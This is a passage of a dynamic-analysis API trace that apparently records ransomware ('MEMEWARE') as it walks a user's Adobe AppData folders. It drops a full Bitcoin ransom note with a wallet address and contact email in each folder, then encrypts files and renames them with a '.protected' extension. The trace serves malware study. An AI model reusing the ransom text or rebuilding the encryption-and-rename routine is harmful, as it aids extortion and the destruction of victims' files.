[0089.447] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0089.447] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*") returned 57 [0089.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.475] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.475] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.475] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.475] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.475] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.475] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\.") returned 57 [0089.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.475] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.475] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.475] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.475] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.475] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.475] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.475] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\..") returned 58 [0089.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.475] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.475] 
lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0089.475] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0089.475] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat") returned 63 [0089.475] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0089.475] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned 65 [0089.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.476] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.476] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.476] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.476] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.476] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\.") returned 65 [0089.476] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.476] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.476] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.476] lstrcmpiW (lpString1="..", lpString2="Program Files") 
returned -1 [0089.476] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.476] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.476] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\..") returned 66 [0089.476] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.476] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.476] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0089.476] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0089.476] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned 68 [0089.476] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0089.476] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned 70 [0089.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.477] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.477] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.477] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0089.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\.") returned 70 [0089.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.477] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.477] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.477] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.477] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.477] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\..") returned 71 [0089.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.477] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="Windows") returned -1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="Program Files") returned -1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="Program Files (x86)") returned -1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="$Recycle.bin") returned 1 [0089.477] lstrcmpiW (lpString1="Collab", lpString2="System Volume Information") returned -1 [0089.477] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned 75 [0089.477] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0089.477] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned 77 [0089.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.478] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\.") returned 77 [0089.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.478] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\..") returned 78 [0089.478] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0089.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.478] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.478] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.478] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\RESTORE_FILES.txt") returned 93 [0089.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.479] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.479] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.480] lstrlenA (lpString="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") returned 684 [0089.480] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.480] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.480] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.480] CloseHandle (hObject=0x150) returned 1 [0089.480] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="Windows") returned -1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="Program Files") returned -1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="Program Files (x86)") returned -1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="$Recycle.bin") returned 1 [0089.480] lstrcmpiW (lpString1="Forms", lpString2="System Volume Information") returned -1 [0089.480] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned 74 [0089.480] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0089.480] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0089.480] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned 76 [0089.480] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.481] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.481] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.481] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.481] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.481] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.481] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\.") returned 76 [0089.481] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.481] 
FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.481] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.481] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.481] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\..") returned 77 [0089.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.481] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.481] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.481] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\RESTORE_FILES.txt") returned 92 [0089.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.482] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.482] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.483] lstrlenA (lpString="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") returned 684 [0089.483] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0089.483] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.483] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.483] CloseHandle (hObject=0x150) returned 1 [0089.483] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.483] lstrcmpiW (lpString1="JavaScripts", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1="JavaScripts", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 80 [0089.484] lstrcmpW (lpString1="JavaScripts", lpString2=".") returned 1 [0089.484] lstrcmpW (lpString1="JavaScripts", lpString2="..") returned 1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned 82 [0089.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.484] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW 
(lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\.") returned 82 [0089.484] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.484] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.484] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\..") returned 83 [0089.484] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.484] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.484] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="Windows") returned -1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="Program Files") returned -1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="Program Files (x86)") returned -1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="$Recycle.bin") returned 1 [0089.484] lstrcmpiW (lpString1="glob.js", lpString2="System Volume Information") returned -1 [0089.484] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.484] StrStrIW (lpFirst="glob.js", lpSrch=".protected") returned 0x0 [0089.484] lstrcmpW (lpString1="glob.js", lpString2="RESTORE_FILES.txt") returned -1 [0089.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.484] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.485] StrStrW (lpFirst="glob.js", lpSrch=".txt") returned 0x0 [0089.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.485] StrStrW (lpFirst="glob.js", lpSrch=".rar") returned 0x0 [0089.485] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js") returned 88 [0089.485] StrStrW (lpFirst="glob.js", lpSrch=".zip") returned 0x0 [0089.485] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0089.485] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.485] 
WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0089.485] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.485] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.486] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.486] CloseHandle (hObject=0x154) returned 1 [0089.486] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.protected") returned 98 [0089.486] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.js.protected" (normalized: "c:\\users\\5p5nrgjn0js 